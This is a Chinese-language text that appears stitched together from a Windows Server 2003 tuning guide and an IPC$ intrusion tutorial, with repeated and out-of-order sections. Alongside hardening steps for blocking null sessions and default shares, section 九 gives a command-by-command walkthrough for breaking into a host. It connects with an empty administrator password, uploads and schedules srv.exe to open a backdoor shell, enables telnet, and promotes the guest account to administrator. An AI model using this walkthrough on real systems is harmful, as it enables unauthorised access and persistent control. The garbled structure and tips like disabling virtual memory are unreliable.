　　打开任意一个文件夹，选择工具（Tools） -> 文件夹选项（Folder Options） -> 查看（View），

　　调整 显示系统文件夹的内容、隐藏受保护的操作系统文件、隐藏文件和文件夹 三项 　　

　　12.允许内置的IMAPI CD-Burning服务和支持Windows影像设备服务 　　

　　.允许内置的IMAPI CD-Burning服务和支持Windows影像设备服务

　　★假如你希望启用Windows内置的IMAPI CD-Burning服务。做如下xx作：

　　打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，在出现的窗口中找到

　　“IMAPI CD-Burning COM Service ”并双击它，然后在启动模式（startup type ）的下拉菜单选择“自动”

　　（Automatic），并点击“应用”（Apply） ->“开始”（Start） -> “确定”（OK） 　　

　　★假如你有如数码相机和扫描仪之类的影像设备，你应该打开Windows Image Acquisition 服务。

　　打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，在出现的窗口中找到

　　“Windows Image Acquisition (WIA) ”并双击它，然后在启动模式（startup type ）的下拉

　　菜单选择“自动”（Automatic），并点击“应用”（Apply） ->“开始”（Start） -> “确定”  
---------------------------------------------
 
  　　13.高级设置 　　

　　★我们可以修改一些windows server 2003的高级设置以适合工作站的应用环境。

　　右键点击“我的电脑”（My Computer）－－属性（Properties）－－高级（Advanced）－－性能（Performance）

　　－－设置（Setting）－－高级（Advanced），把“处理器计划”（Processor scheduling ）和内存使用

　　（Memory usage）分配给“程序”（Programs）使用。然后点击“确定”（OK.） 　　

　　★禁用错误报告

　　右键点击“我的电脑”（My Computer）－－属性（Properties）－－高级（Advanced）－－点击“错误报告”

　　（Error Reporting ）按钮，在出现的窗口中把“禁用错误报告”（Disable Error Reporting）选上并复选“

　　但在发生严重错误时通知我”（But, notify me when critical errors occur.） 　　

　　★调整虚拟内存

　　一些朋友经常会对关机和注销缓慢感到束手无策，解决办法就是禁用虚拟内存，这样你的注销和关机时间可能

　　会加快很多。右键点击“我的电脑”（My Computer）－－属性（Properties）－－高级（Advanced）－－性能

　　（Performance）－－设置（Setting）－－高级（Advanced），点击“虚拟内存”（Virtual memory）部分的

　　“更改”（Change），然后在出现的窗口选择“无分页文件”。重启系统即可。 　　

　　14.加快启动和运行速度 　　

　　★修改注册表，减少预读取，减少进度条等待时间：

　　开始→运行→regedit启动注册表编辑器，HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session

　　Manager\Memory Management\PrefetchParameters， 有一个键值名为EnablePrefetcher，它的值是3,把它改为

　　“1”或“5”。找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control，

　　将 WaitToKillServiceTimeout 设为：1000或更小。 ( 原设定值：20000 )

　　找到 HKEY_CURRENT_USER\Control Panel\Desktop 键，将右边视窗的

　　WaitToKillAppTimeout 改为 1000， ( 原设定值：20000 )即关闭程序时仅等待1秒。

　　将 HungAppTimeout 值改为：200( 原设定值：5000 )， 表示程序出错时等待0.5秒。 　　

　　★让系统自动关闭停止回应的程式。

　　打开注册表 HKEY_CURRENT_USER\Control Panel\Desktop 键，

　　将 AutoEndTasks 值设为 1。 ( 原设定值：0 ) 　　

　　★禁用系统服务Qos

　　开始菜单→运行→键入 gpedit.msc ，出现“组策略”窗口， 展开 "管理模板”→“网络” ， 展开 "QoS 数

　　据包调度程序"， 在右边窗右键单击“限制可保留带宽" ，在属性中的“设置”中有“限制可保留带宽" ，选

　　择“已禁用”，确定即可。当上述修改完成并应用后，用户在网络连接的属性对话框内的一般属性标签栏中如

　　果能够看到"QoS Packet Scheduler（QoS 数据包调度程序）"。说明修改成功，否则说明修改失败。

--------------------------------------------------------------------------------
 
  　　★改变窗口弹出的速度：

　　找到HKEY_CURRENT_USER＼Control Panel＼Desktop＼WindowMetrics子键分支，在右边的窗口中找到

　　MinAniMate键值，其类型为REG_SZ，默认情况下此健值的值为1，表示打开窗口显示的动画，把它改为0，则禁

　　止动画显示，接下来从开始菜单中选择“注销”命令，激活刚才所作的修改。 　　

　　★禁止Windows XP的压缩功能：

　　点击“开始”下的“运行”，在“运行”输入框中输入“regsvr32/u zipfldr.dll”，然后按回车键即可。 　　

　　★设置个性的启动信息或警告信息：

　　个性化的Windows XP启动：打开注册表编辑器，找到HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows NT

　　＼CurrentVersion＼Winlogon子键分支，双击LegalNoticeCaption健值，打开“编辑字符串”对话框，在“数

　　值数据”下的文本框中输入自己想要的信息标题，如“哥们儿，你好！”，然后点击“确定”，重新启动。

　　如果想要改变警告信息的话可以双击LegalNoticeText健值名称，在出现的“编辑字符串”窗口中输入想要显示

　　的警告信息，单击“确定”，重新启动。 　　

　　15.安装Java VM

　　Windows server 2003没有集成MS Java VM或Sun Java VM,你可以自行下载并安装它。 　　

　　16.安装DirectX 9a 　　

　　在Windows Server 2003上安装DirectX 9a和在其他版本的Windows上安装DirectX 9a的方法是一样的。安装之前

　　必须先启用DirectX and Graphics Acceleration。 　　

　　17.可用的杀毒软件和防火墙：

　　Symantec Norton Antivirus Corporate 8.01

　　Zone Alarm 3.7.159

　　Norton Personal Firewall 2003  

--------------------------------------------------------------------------------
 
  　　五、如何防范ipc$入侵 　　

　　1、禁止空连接进行枚举(此操作并不能阻止空连接的建立) 　　

　　首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把

　　RestrictAnonymous = DWORD的键值改为：00000001。

　　restrictanonymous REG_DWORD

　　0x0 缺省

　　0x1 匿名用户无法列举本机用户列表

　　0x2 匿名用户无法连接本机IPC$共享

　　说明:不建议使用2，否则可能会造成你的一些服务无法启动，如SQL Server 　　

　　2、禁止默认共享

　　1）察看本地共享资源

　　运行-cmd-输入net share

　　2）删除共享(每次输入一个）

　　net share ipc$ /delete

　　net share admin$ /delete

　　net share c$ /delete

　　net share d$ /delete（如果有e,f,……可以继续删除）

　　3）修改注册表删除共享

　　运行-regedit

　　找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]

　　把AutoShareServer（DWORD）的键值改为0000000。

　　如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。 　　

　　3、停止server服务 　　

　　1）暂时停止server服务

　　net stop server /y （重新启动后server服务会重新开启）

　　2）永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务

　　控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用 　　

　　4、安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等) 　　

　　1).解开文件和打印机共享绑定

　　鼠标右击桌面上[网络邻居]→[属性]→[本地连接]→[属性]，去掉“Microsoft网络的文件和打印机共享”前面的勾，解开文件和打印机共享绑定。这样就会禁止所有从139和445端口来的请求，别人也就看不到本机的共享了。

　　2).利用TCP/IP筛选

　　鼠标右击桌面上[网络邻居]→[属性]→[本地连接]→[属性]，打开“本地连接属性”对话框。选择[Internet协议(TCP/IP)]→[属性]→[高级]→[选项]，在列表中单击选中“TCP/IP筛选”选项。单击[属性]按钮，选择“只允许”，再单击[添加]按钮(如图2)，填入除了139和445之外要用到的端口。这样别人使用扫描器对139和445两个端口进行扫描时，将不会有任何回应。

　　3).使用IPSec安全策略阻止对端口139和445的访问

　　选择[我的电脑]→[控制面板]→[管理工具]→[本地安全策略]→[IP安全策略，在本地机器]，在这里定义一条阻止任何IP地址从TCP139和TCP445端口访问IP地址的IPSec安全策略规则，这样别人使用扫描器扫描时，本机的139和445两个端口也不会给予任何回应。

　　4).使用防火墙防范攻击

　　在防火墙中也可以设置阻止其他机器使用本机共享。如在“天网个人防火墙”中，选择一条空规则，设置数据包方向为“接收”，对方IP地址选“任何地址”，协议设定为“TCP”，本地端口设置为“139到139”，对方端口设置为“0到0”，设置标志位为“SYN”，动作设置为“拦截”，最后单击[确定]按钮，并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了(如图3)。 　　

　　5、给所有账户设置复杂密码，防止通过ipc$穷举密码

解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2004年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因：
错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows 无法找到网络路径 : 网络有问题；
错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。
错误号1326，未知的用户名或错误密码 ： 原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）
错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。
关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.

六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。

七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享
1）察看本地共享资源
运行-cmd-输入net share
2）删除共享(每次输入一个）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）
3）停止server服务
net stop server /y （重新启动后server服务会重新开启）
4）修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。
如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码，防止通过ipc$穷举密码

八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)
如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接
net use \\IP\ipc$ /del

5)删除共享映射
net use c: /del 删除映射的c盘，其他盘类推
net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。
　　
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。
　　
3. C:\>net time \\127.0.0.1
查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。
　　
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）
　　
5. C:\>net time \\127.0.0.1
再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。
　　
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了
　　
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。
　　
8. C:\WINNT\system32>ntlm
输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

十 总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.